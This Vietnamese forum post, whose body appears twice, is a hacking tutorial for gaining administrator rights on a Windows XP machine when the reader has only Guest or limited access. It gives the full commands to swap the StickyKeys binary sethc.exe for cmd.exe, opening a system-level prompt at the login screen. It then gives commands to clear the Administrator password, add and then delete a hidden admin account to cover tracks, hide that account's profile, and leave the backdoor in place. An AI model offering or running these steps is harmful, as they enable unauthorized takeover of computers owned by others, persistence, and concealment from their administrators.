Hack Password Administrators
Trang 1 trong tổng số 1 trang
Hack Password Administrators
Trong Windows XP có 1 chương trình gọi là StickyKey, khi chúng ta nhấn phím Shift 5 lần thì chương trình này sẽ hiện ra:
File thực thi của chương trình này là C:\windows\system32\sethc.exe
Chúng ta sẽ Hack Pass Admin từ lỗ hổng của chương trình này.
Khi sử dụng 1 máy tính nào đó mà chỉ có quyền của Guest hoặc Limited User,chúng ta cần cài đặt một ứng dụng nhưng ứng dụng này đòi hỏi quyền Admin mới có thể cài đặt.
Hack Pass Admin nha
Thực hiện theo các bước sau:
Bước 1:
Vào Run gõ cmd
gõ vào các dòng lệnh sau: (khuyến khích nên gõ cho quen lệnh)
cd %systemroot%/system32
rename sethc.exe sethc.exe.bak (đổi tên sethc.exe thành sethc.bak)
copy cmd.exe sethc.exe /y (thay thế file sethc.exe bằng file cmd.exe)
(hoặc mở Notepad, paste đoạn mã trên vào và lưu lại với tên là crack.cmd Sau đó Double-Clik lên file crack.cmd để thực thi.)
Bước 2:
Log off user đang dùng (Guest hoặc Limited user),từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Prompt được gọi thay vì StickyKey thì bạn đã thành công!
Chương trình StickyKey đã được thay bằng hộp thoại Command Line
Ở cửa số Command Prompt này chúng ta sẽ có toàn quyền biến đổi tùy ý các Users có trên máy!
Bước 3:
Một số lệnh Command:
Xem những user nào hiện có trên máy (kể cả các user ần)
net user
Xóa trắng password của Administrator(hay tương tự với bất kì user nào)cái này thì ko nên tí nào! dễ lộ lắm!
net user Administrator
cái này thì ko nên tí nào! dễ lộ lắm!hehe..
Thêm tài khoản ICT với password là uitstudent vào hệ thống
net user ICT uitstudent /add
Gán tài khoản ICT vào nhóm Quản Trị :
net localgroup Administrators ICT /add
Sau khi thực hiện các lệnh trên thì ICT đã là một thành viên của Administrators,có thể đăng nhập vào hệ thống mà không cần khởi động lại máy!
Sau khi dùng xong tài khoản mới tạo thì xóa đi để giấu dấu vết.
net user ICT /delete
Ẩn profile ứng với tài khoản ICT(xóa thì lâu lắm)
attrib +s +h +r C:\Documents and Settings\ICT
Với những Admin chuyên nghiệp thì sẽ biết có sự tồn tại của Profile mới tạo nhưng cmd.exe đã đổi tên thành sethc.exe vẫn còn trong System32, thì chúng ta vẫn còn nắm quyền kiểm soát!Hehehe
File thực thi của chương trình này là C:\windows\system32\sethc.exe
Chúng ta sẽ Hack Pass Admin từ lỗ hổng của chương trình này.
Khi sử dụng 1 máy tính nào đó mà chỉ có quyền của Guest hoặc Limited User,chúng ta cần cài đặt một ứng dụng nhưng ứng dụng này đòi hỏi quyền Admin mới có thể cài đặt.
Hack Pass Admin nha
Thực hiện theo các bước sau:
Bước 1:
Vào Run gõ cmd
gõ vào các dòng lệnh sau: (khuyến khích nên gõ cho quen lệnh)
cd %systemroot%/system32
rename sethc.exe sethc.exe.bak (đổi tên sethc.exe thành sethc.bak)
copy cmd.exe sethc.exe /y (thay thế file sethc.exe bằng file cmd.exe)
(hoặc mở Notepad, paste đoạn mã trên vào và lưu lại với tên là crack.cmd Sau đó Double-Clik lên file crack.cmd để thực thi.)
Bước 2:
Log off user đang dùng (Guest hoặc Limited user),từ cửa sổ chờ Login vào Windows, nhấp phím Shift 5 lần, nếu chương trình Command Prompt được gọi thay vì StickyKey thì bạn đã thành công!
Chương trình StickyKey đã được thay bằng hộp thoại Command Line
Ở cửa số Command Prompt này chúng ta sẽ có toàn quyền biến đổi tùy ý các Users có trên máy!
Bước 3:
Một số lệnh Command:
Xem những user nào hiện có trên máy (kể cả các user ần)
net user
Xóa trắng password của Administrator(hay tương tự với bất kì user nào)cái này thì ko nên tí nào! dễ lộ lắm!
net user Administrator
cái này thì ko nên tí nào! dễ lộ lắm!hehe..
Thêm tài khoản ICT với password là uitstudent vào hệ thống
net user ICT uitstudent /add
Gán tài khoản ICT vào nhóm Quản Trị :
net localgroup Administrators ICT /add
Sau khi thực hiện các lệnh trên thì ICT đã là một thành viên của Administrators,có thể đăng nhập vào hệ thống mà không cần khởi động lại máy!
Sau khi dùng xong tài khoản mới tạo thì xóa đi để giấu dấu vết.
net user ICT /delete
Ẩn profile ứng với tài khoản ICT(xóa thì lâu lắm)
attrib +s +h +r C:\Documents and Settings\ICT
Với những Admin chuyên nghiệp thì sẽ biết có sự tồn tại của Profile mới tạo nhưng cmd.exe đã đổi tên thành sethc.exe vẫn còn trong System32, thì chúng ta vẫn còn nắm quyền kiểm soát!Hehehe
Similar topics
» CHÔM PASSWORD VÀ ĐỌC LÉN MAIL CỦA SẾP
» Recovery Password Switch
» System Hacking - Bài 1 - Crack password nột bộ nội bộ
» Kỹ thuật Sniff Password sử dụng Cain & Abel (phần 1)
» Kỹ thuật Sniff Password sử dụng Cain & Abel (phần 2)
» Recovery Password Switch
» System Hacking - Bài 1 - Crack password nột bộ nội bộ
» Kỹ thuật Sniff Password sử dụng Cain & Abel (phần 1)
» Kỹ thuật Sniff Password sử dụng Cain & Abel (phần 2)
Trang 1 trong tổng số 1 trang
Permissions in this forum:
Bạn không có quyền trả lời bài viết
27/8/2013, 11:45 am by echcondihoc
» Quản Lí Tiến Trình Dùng Thư Viện PSAPI
11/10/2011, 9:42 pm by CNTT_DH
» xin tai lieu tieng viet
31/8/2011, 6:59 am by bantoisg
» Theo dõi tiến trình
27/8/2011, 5:51 pm by haigaopro01
» Giải pháp Bảo mật của Cisco
17/6/2011, 8:50 am by admin
» Nghiên cứu và đưa ra giải pháp phòng chống tấn công DoS, DDoS (Phần 1)
16/6/2011, 2:32 pm by admin
» Learn to hack !
16/6/2011, 8:49 am by admin
» Giải pháp hệ thống dành cho doanh nghiệp với thiết bị mạng Fortinet (Phần 1)
15/6/2011, 11:12 am by admin
» Ô Long Viên (Tập II)
27/9/2010, 4:56 pm by root
» những ebook về hack tiếng việt cho người mới tìm hiểu.
27/9/2010, 4:54 pm by root